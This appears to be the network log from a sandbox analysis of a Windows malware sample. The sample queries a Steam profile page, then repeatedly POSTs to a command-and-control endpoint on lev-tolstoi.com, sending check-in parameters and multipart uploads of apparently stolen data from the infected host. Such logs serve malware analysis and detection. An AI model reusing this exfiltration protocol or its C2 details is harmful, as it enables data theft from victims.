Timestamp / Bytes transferred / Direction / Data:

2024-12-23 06:18:43 UTC, 219 bytes, OUT:
GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

2024-12-23 06:18:43 UTC, 1905 bytes, IN:
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 23 Dec 2024 06:18:43 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=16219b16eba2e1d25c63a86f; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None

2024-12-23 06:18:43 UTC, 14479 bytes, IN:
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>

2024-12-23 06:18:44 UTC, 10097 bytes, IN:
Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT

2024-12-23 06:18:44 UTC, 10545 bytes, IN:
Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
1 | 192.168.2.8 | 49705 | 104.21.66.86 | 443 | 1464 | C:\Users\user\Desktop\0gnHF2twcT.exe

Timestamp / Bytes transferred / Direction / Data:

2024-12-23 06:18:45 UTC, 262 bytes, OUT:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com

2024-12-23 06:18:45 UTC, 8 bytes, OUT:
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

2024-12-23 06:18:46 UTC, 1123 bytes, IN:
HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 06:18:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=rvv1vtn1sqk57dktdtkt0m0jaj; expires=Fri, 18 Apr 2025 00:05:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6cBhmk9traACxqc2rJ2K6vcHXyQW5ck2kYE01POGvP%2BjDb9MlgBl3x8k5Mp0DJ30YG2IA0LlEQZ51%2BUahwyXfpVmc4m81MDgRitoTHcTTtRBz1FrA%2F5zF0jfvYcqVjJI6hs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f663c73ffcb43a6-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1596&rtt_var=765&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1829573&cwnd=186&unsent_bytes=0&cid=93f65b983148dc7d&ts=762&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:18:46 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                                                                  2024-12-23 06:18:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.8  49706        104.21.66.86    443               1464  C:\Users\user\Desktop\0gnHF2twcT.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-23 06:18:47 UTC  263 bytes  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: lev-tolstoi.com
2024-12-23 06:18:47 UTC  47 bytes  OUT  Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-23 06:18:48 UTC  1128 bytes  IN  HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 06:18:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=sdq7r0c7mh1l34q3d356oelqki; expires=Fri, 18 Apr 2025 00:05:27 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPe%2BI6ktVGM7wXOQqyUiSlU9NWMMmwniV%2FyBj%2BzchLIdFsgMajaZSW7dNOY5ZXNVXC1EcFtv5CZjONcG2Zu%2FWk10gFDXcKJl6yPO9u6KGmW4lZkcpQ3nFUEmHV1L%2FlMCIZg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f663c807a1843ad-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1597&rtt_var=602&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=946&delivery_rate=1814791&cwnd=203&unsent_bytes=0&cid=69ba1f01fc6960a9&ts=1055&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.8  49707        104.21.66.86    443               1464  C:\Users\user\Desktop\0gnHF2twcT.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-23 06:18:50 UTC  277 bytes  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=ZKXX8IDAOM1N3I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12822
Host: lev-tolstoi.com
2024-12-23 06:18:50 UTC  12822 bytes  OUT  Data Ascii (decoded from the report's hex dump with CRLF line breaks restored; the dump is truncated in the report):
--ZKXX8IDAOM1N3I
Content-Disposition: form-data; name="hwid"

12F15CD0B2C9F241AC8923850305D13E
--ZKXX8IDAOM1N3I
Content-Disposition: form-data; name="pid"

2
--ZKXX8IDAOM1N3I
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--ZKXX8IDA
                                                                                                                                                                                                                                                                  2024-12-23 06:18:50 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:18:50 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=0hh0urt5o8hfdu3glfv2bb59hv; expires=Fri, 18 Apr 2025 00:05:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JlYzObvsw7maFicZm4tApZchePhU9y3l1e1f31djvwadvfBNQKQMb6me4qG8Cx0wuyTZWnMn5R9G53XZSg4QNBg5MLj%2B3HVYaqnte21Vy7SSGVMAnmgBycfpwnmoWmSTQdE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f663c910ebd4302-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1564&rtt_var=601&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13757&delivery_rate=1796923&cwnd=252&unsent_bytes=0&cid=544eab8b04a94ad2&ts=756&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:18:50 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                  2024-12-23 06:18:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.8  49708        104.21.66.86    443               1464  C:\Users\user\Desktop\0gnHF2twcT.exe

Timestamp  Bytes transferred  Direction  Data

2024-12-23 06:18:52 UTC  274 bytes  OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KR0VE528KXP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15033
Host: lev-tolstoi.com

2024-12-23 06:18:52 UTC  15033 bytes  OUT
Data Raw: 2d 2d 4b 52 30 56 45 35 32 38 4b 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 31 35 43 44 30 42 32 43 39 46 32 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 52 30 56 45 35 32 38 4b 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 52 30 56 45 35 32 38 4b 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 52 30 56 45 35 32 38 4b 58 50 0d 0a 43 6f 6e 74
Data Ascii: --KR0VE528KXPContent-Disposition: form-data; name="hwid"12F15CD0B2C9F241AC8923850305D13E--KR0VE528KXPContent-Disposition: form-data; name="pid"2--KR0VE528KXPContent-Disposition: form-data; name="lid"PsFKDg--pablo--KR0VE528KXPCont

2024-12-23 06:18:53 UTC  1137 bytes  IN
HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 06:18:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=eh07i3emli34f6jichch001t25; expires=Fri, 18 Apr 2025 00:05:31 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uj2TeDqKgrcT%2FEMqX3WHlP%2BbgN0lIE1hK%2Fz002mSGf3C9LTUjE8a0YeYL89yU4%2FciCeh%2FPLy49uERnrrJf4HYHQWE1v3m4Cx553IKY07RN%2B48lCfqAo5qU%2BBqwvzaqW4c%2BU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f663c9e090d4381-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1570&rtt_var=598&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2834&recv_bytes=15965&delivery_rate=1815920&cwnd=211&unsent_bytes=0&cid=e324f8c591519fd4&ts=838&x=0"

2024-12-23 06:18:53 UTC  20 bytes  IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189

2024-12-23 06:18:53 UTC  5 bytes  IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.8  49710        104.21.66.86    443               1464  C:\Users\user\Desktop\0gnHF2twcT.exe

Timestamp  Bytes transferred  Direction  Data

2024-12-23 06:18:54 UTC  275 bytes  OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=RW4EII7M5UG7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20206
Host: lev-tolstoi.com

2024-12-23 06:18:54 UTC  15331 bytes  OUT
Data Raw: 2d 2d 52 57 34 45 49 49 37 4d 35 55 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 31 35 43 44 30 42 32 43 39 46 32 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 57 34 45 49 49 37 4d 35 55 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 57 34 45 49 49 37 4d 35 55 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 52 57 34 45 49 49 37 4d 35 55 47 37 0d 0a
Data Ascii: --RW4EII7M5UG7Content-Disposition: form-data; name="hwid"12F15CD0B2C9F241AC8923850305D13E--RW4EII7M5UG7Content-Disposition: form-data; name="pid"3--RW4EII7M5UG7Content-Disposition: form-data; name="lid"PsFKDg--pablo--RW4EII7M5UG7

2024-12-23 06:18:54 UTC  4875 bytes  OUT
Data Raw: 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0

2024-12-23 06:18:55 UTC  1123 bytes  IN
HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 06:18:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=2utgb84mvrde7ns5vd88psf0kk; expires=Fri, 18 Apr 2025 00:05:34 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Im%2BznI93eYlwqE8ocPewjKZO9ioxTZiIFKiHxAXiGtPEiPJnxafmRqZjwOwDzikj2ts90GhHzLCITUmmsmtfmvjGrgQFFTjCgJX21pBWUBpuWTONxZ68frsDzDMip41yuMY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f663cae2b3b43f7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1580&rtt_var=597&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21161&delivery_rate=1823860&cwnd=213&unsent_bytes=0&cid=54e8a5e6c73ba394&ts=979&x=0"

2024-12-23 06:18:55 UTC  20 bytes  IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189

2024-12-23 06:18:55 UTC  5 bytes  IN
Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.8 | 49713       | 104.21.66.86   | 443              | 1464 | C:\Users\user\Desktop\0gnHF2twcT.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:18:57 UTC | 270 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=90K0SFJK
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1170
    Host: lev-tolstoi.com
2024-12-23 06:18:57 UTC | 1170 | OUT | Data Raw: 2d 2d 39 30 4b 30 53 46 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 31 35 43 44 30 42 32 43 39 46 32 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 30 4b 30 53 46 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 30 4b 30 53 46 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 39 30 4b 30 53 46 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
    Data Ascii: --90K0SFJKContent-Disposition: form-data; name="hwid"12F15CD0B2C9F241AC8923850305D13E--90K0SFJKContent-Disposition: form-data; name="pid"1--90K0SFJKContent-Disposition: form-data; name="lid"PsFKDg--pablo--90K0SFJKContent-Disposit
2024-12-23 06:18:58 UTC | 1136 | IN | HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 06:18:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=2b2o8r5f6vheg97benuuli2fpc; expires=Fri, 18 Apr 2025 00:05:37 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2FHQR1Hg6hZOvLQR%2BlYU31wecUr14VNX4QG%2FeztHjBDMd%2BzzNEheyEH4zQJxoXxaY7FD%2BHN5ZgDRxNp9lPZtExkhzRyg6SAoQ3%2FVpf6ZCj7%2FYPExz7XKO3Eu%2BQaR4RAo%2B6M%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f663cbe9ce443a0-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1552&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2076&delivery_rate=1820448&cwnd=219&unsent_bytes=0&cid=1e16c614f88c114b&ts=793&x=0"
2024-12-23 06:18:58 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-23 06:18:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.8 | 49714       | 104.21.66.86   | 443              | 1464 | C:\Users\user\Desktop\0gnHF2twcT.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:19:00 UTC | 276 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=08RS2QQ5TDI6
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 588250
    Host: lev-tolstoi.com
2024-12-23 06:19:00 UTC | 15331 | OUT | Data Raw: 2d 2d 30 38 52 53 32 51 51 35 54 44 49 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 31 35 43 44 30 42 32 43 39 46 32 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 38 52 53 32 51 51 35 54 44 49 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 38 52 53 32 51 51 35 54 44 49 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 30 38 52 53 32 51 51 35 54 44 49 36 0d 0a
    Data Ascii: --08RS2QQ5TDI6Content-Disposition: form-data; name="hwid"12F15CD0B2C9F241AC8923850305D13E--08RS2QQ5TDI6Content-Disposition: form-data; name="pid"1--08RS2QQ5TDI6Content-Disposition: form-data; name="lid"PsFKDg--pablo--08RS2QQ5TDI6
2024-12-23 06:19:00 UTC | 15331 | OUT | Data Raw: 46 f6 77 84 bb 58 ae ea 83 05 c6 4f 9b 83 bf 25 df 69 f8 58 98 46 2a e8 3e 1d dd 40 04 0f 8a b7 2f d9 4e 45 e8 c0 95 9e 08 bb 6d 2a 4f 2c 41 42 b3 f6 43 f1 a4 88 43 f1 a2 40 6e 0c 4a ad 85 53 4e 3b 32 5c a5 40 92 1d a1 80 bf 99 40 cd c4 e5 19 ca 33 ce a5 76 ee e9 d0 1d 6d 46 b4 9f c9 66 99 d4 49 40 bf bb 1f 70 9a e7 e8 a3 27 51 dc 17 de 3e 7e 6d dd b3 65 28 51 7d f7 71 57 81 d1 ca 88 85 ff f6 b1 2f f2 11 80 09 9b 9f 71 13 30 24 30 63 77 7f 07 c2 40 0d 6a 56 9c d5 30 47 22 28 ee a6 c6 11 79 86 fd af 9a 06 4f 7c 4f 30 e3 11 56 60 27 92 0f 87 7c 05 a9 de 1b bd 05 d7 00 7d a0 22 4e fc 30 ac ad de 17 21 8d 8c 77 fc e1 25 7b 69 f4 a5 22 fb 66 c9 9e 8c 59 f4 3c 35 06 9a a8 23 d1 d7 e7 96 4c 0f 04 b7 8c c4 19 8e e2 3b 5c 3f 41 ed 02 19 1e b6 7c c0 7b 3c c5 ce f5
    Data Ascii: FwXO%iXF*>@/NEm*O,ABCC@nJSN;2\@@3vmFfI@p'Q>~me(Q}qW/q0$0cw@jV0G"(yO|O0V`'|}"N0!w%{i"fY<5#L;\?A|{<
2024-12-23 06:19:00 UTC | 15331 | OUT | Data Raw: 7d 2a f0 f2 2f e1 b0 7b 85 e6 bb c4 76 08 12 17 cb 7c c6 6f ea 47 78 69 15 66 d2 db 0a 57 9e d4 05 ba a7 45 46 44 6c 1e bc 8c bc 5d f7 ac 20 fc 1b 75 26 7d 8e a5 8e 3a b5 2e ce b0 db d3 82 be ba 1f 9f 46 9b 27 36 7f 31 14 5d 19 96 a1 0b 7d cc a6 cc 10 dc 78 c1 25 05 0d c8 b1 ad 75 ba d2 66 bb b4 7f e3 5e dd 7c 68 62 f0 cc cd 8a 8d 6b 3e ed a7 8f 94 d8 6f 8f 17 cd ff 78 c6 f2 97 28 2e 76 04 f8 49 9f a5 9f 1a 03 cf 9c 93 e7 62 0d d6 2c 9f da ac ff 1d 49 c8 d4 4f b0 4e 46 95 66 1e 02 be 3f d9 4b a3 fb 00 dc e3 d9 95 e4 5f f7 5f b9 9c 11 ea 36 00 96 ed bd 13 a0 23 e0 12 38 34 78 ef 90 53 ea 78 82 3a 0e 98 70 ca a4 8e fe 77 a7 cd 43 1c 7c 41 08 dc 21 81 b5 64 ae 35 42 27 e4 81 db 25 cc f7 ff 3b c1 4a f1 3c ea fb 7b 24 c2 42 c0 2d fd 20 92 0c 30 20 28 4c 1d 64
